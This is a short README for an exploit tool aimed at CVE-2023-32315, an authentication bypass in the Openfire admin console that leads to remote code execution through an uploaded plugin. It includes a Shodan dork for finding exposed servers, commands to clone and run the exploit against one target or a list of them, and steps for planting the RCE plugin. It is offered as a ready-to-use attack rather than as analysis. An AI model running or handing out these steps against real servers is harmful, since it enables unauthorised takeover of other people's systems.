CVE-2023-32315

Openfire Console Authentication Bypass Vulnerability with RCE plugin

Dorks

//Shodan
html:"jive-loginVersion"

Setup

git clone <https://github.com/miko550/CVE-2023-32315.git>
cd CVE-2023-32315
pip3 install -r requirements.txt

Usage

python3 CVE-2023-32315.py -t <http://127.0.0.1:9090>
python3 CVE-2023-32315.py -l lists.txt

Step

  1. Run exploit
  2. login with newly added user
  3. goto tab plugin > upload pluginĀ openfire-management-tool-plugin.jar
  4. goto tab server > server settings > Management tool